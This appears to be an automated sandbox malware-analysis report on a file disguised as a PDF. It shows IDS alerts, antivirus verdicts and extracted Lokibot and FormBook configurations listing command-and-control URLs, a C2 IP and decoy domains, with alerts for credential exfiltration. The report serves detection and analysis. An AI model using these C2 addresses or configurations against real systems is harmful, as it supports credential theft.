            Timestamp:05/29/24-15:44:39.311748
            SID:2021641
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:46.833672
            SID:2025381
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:31.132505
            SID:2024313
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:09.224417
            SID:2024313
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:25.482920
            SID:2025381
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:25.723486
            SID:2024318
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:04.642667
            SID:2021641
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:17.418907
            SID:2021641
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:20.544811
            SID:2021641
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:47.749478
            SID:2024313
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:25.723486
            SID:2024313
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:09.224417
            SID:2024318
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:03.719373
            SID:2024313
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:17.857076
            SID:2021641
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:03.719373
            SID:2024318
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:33.985205
            SID:2024313
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:11.942922
            SID:2024313
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:30.801731
            SID:2021641
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:26.168825
            SID:2025381
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:33.985205
            SID:2024318
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:49.526860
            SID:2025381
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:34.630779
            SID:2025381
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:44.149214
            SID:2024318
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:36.746086
            SID:2025381
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:15.181530
            SID:2024318
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:44.149214
            SID:2024313
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:17.880992
            SID:2024318
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:00.934566
            SID:2024313
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:28.214472
            SID:2021641
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:15.181530
            SID:2024313
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:14.729917
            SID:2024313
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:01.734415
            SID:2024318
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:06.434631
            SID:2025381
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:00.934566
            SID:2024318
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:01.734415
            SID:2024313
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:53.430975
            SID:2024313
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:17.880992
            SID:2024313
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:53.430975
            SID:2024318
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:28.419439
            SID:2025381
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:42.013116
            SID:2021641
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:55.765644
            SID:2021641
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:50.468524
            SID:2025381
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:44.907872
            SID:2025381
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:06.533178
            SID:2025381
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:20.008059
            SID:2024318
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:48.086059
            SID:2021641
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:03.791896
            SID:2024318
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:20.008059
            SID:2024313
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:03.791896
            SID:2024313
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:50.288079
            SID:2024318
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:26.177150
            SID:2021641
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:50.288079
            SID:2024313
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:41.960861
            SID:2024313
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:55.212846
            SID:2021641
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:59.101278
            SID:2025381
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:41.960861
            SID:2024318
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:15.295734
            SID:2025381
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:58.351209
            SID:2024313
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:38.811867
            SID:2021641
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:39.931883
            SID:2021641
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:28.740548
            SID:2025381
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:09.285920
            SID:2021641
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:12.652341
            SID:2021641
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:58.351209
            SID:2024318
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:56.184812
            SID:2021641
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:58.470593
            SID:2025381
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:12.009845
            SID:2025381
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:37.356647
            SID:2024313
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:23.375856
            SID:2024318
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:03.852643
            SID:2021641
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:37.356647
            SID:2024318
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:52.300724
            SID:2024318
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:58.198557
            SID:2025381
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:42.784784
            SID:2025381
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:36.155572
            SID:2024318
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:52.300724
            SID:2024313
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:23.375856
            SID:2024313
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:36.155572
            SID:2024313
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Ajanlatkeres_2024.05.29.PDF.exeAvira: detected
            Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
            Source: http://www.servicepmgtl.worldAvira URL Cloud: Label: malware
            Source: http://45.61.137.215/index.php/3b1tenbkyjAvira URL Cloud: Label: malware
            Source: http://www.servicepmgtl.world/dn03/www.sukhiclothing.comAvira URL Cloud: Label: malware
            Source: http://www.servicepmgtl.world/dn03/Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeAvira: detection malicious, Label: HEUR/AGEN.1311105
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/3b1tenbkyj"]}
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sukhiclothing.com/dn03/"], "decoy": ["almouranipainting.com", "cataloguia.shop", "zaparielectric.com", "whcqsc.com", "ioco.in", "aduredmond.com", "vavada611a.fun", "humtivers.com", "jewellerytml.com", "mcapitalparticipacoes.com", "inhlcq.shop", "solanamall.xyz", "moviepropgroup.com", "thegenesis.ltd", "cyberxdefend.com", "skinbykoco.com", "entermintlead.com", "honestaireviews.com", "wyclhj7gqfustzp.buzz", "w937xb.com", "bakuusa.online", "sabong-web.com", "52cg2.club", "jasonnutter.golf", "odbet555.app", "vipmotoryatkiralama.com", "auravibeslighting.com", "pulsesautos.com", "imdcaam.com", "vivaness.club", "bovverbadges.com", "giaydonghai.online", "aditi-jobs.com", "numericalsemantics.com", "shoprazorlaser.com", "lovedacademy.com", "gets-lnds.io", "teyo293.xyz", "banditsolana.com", "delivery-jobs-76134.bond", "ppp5716.buzz", "zjmeterial.com", "de-ponqk.top", "bntyr76rhg.top", "servicepmgtl.world", "nailtimelocust.top", "paperappa.com", "80sos.com", "daysofbetting.com", "slaytheday.fun", "travauxdefou.com", "bx2zyg.com", "thecoxnews.com", "qriskaq.com", "top-dao.com", "krstockly1.shop", "roiwholesale.com", "pajero777ads.click", "twistedrubytx.com", "thesovreignkingdomofmaui.info", "cataclysmicgamingapparel.com", "verxop.xyz", "xn--kwra1023b.com", "winterclairee.com"]}
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeReversingLabs: Detection: 23%
            Source: Ajanlatkeres_2024.05.29.PDF.exeReversingLabs: Detection: 28%
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeJoe Sandbox ML: detected
            Source: Ajanlatkeres_2024.05.29.PDF.exeJoe Sandbox ML: detected
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: chkdsk.pdbGCTL source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: Eusz.pdb source: Ajanlatkeres_2024.05.29.PDF.exe
            Source: Binary string: jORR.pdbSHA2563 source: YLc7afPlL4RjCeK.exe.6.dr
            Source: Binary string: chkdsk.pdb source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: jORR.pdb source: YLc7afPlL4RjCeK.exe.6.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: Eusz.pdbSHA256 source: Ajanlatkeres_2024.05.29.PDF.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,15_2_00403D74
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 4x nop then jmp 077B97F2h14_2_077B9271
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 4x nop then jmp 077B97F2h14_2_077B9541
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 4x nop then jmp 077B97F2h14_2_077B9201
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi19_2_0041732B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi21_2_00A4732B

            Networking

            barindex
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.9:49712 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49712 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49712 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.9:49712 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.9:49714 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49714 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49714 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.9:49714 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49715 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49715 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49715 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49715 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49716 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49716 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49716 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49716 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49717 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49717 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49717 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49717 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49720 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49720 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49720 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49720 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49721 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49721 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49721 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49721 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49722 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49722 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49722 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49722 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49723 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49723 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49723 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49723 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49724 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49724 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49724 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49724 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49725 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49725 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49725 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49725 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49726 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49726 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49726 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49726 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49727 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49728 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49728 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49728 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49728 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49729 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49729 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49729 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49729 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49730 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49730 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49730 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49730 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49731 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49731 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49731 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49731 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49732 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49732 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49732 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49732 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49734 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49734 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49734 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49734 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49735 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49735 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49735 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49735 -> 45.61.137.215:80
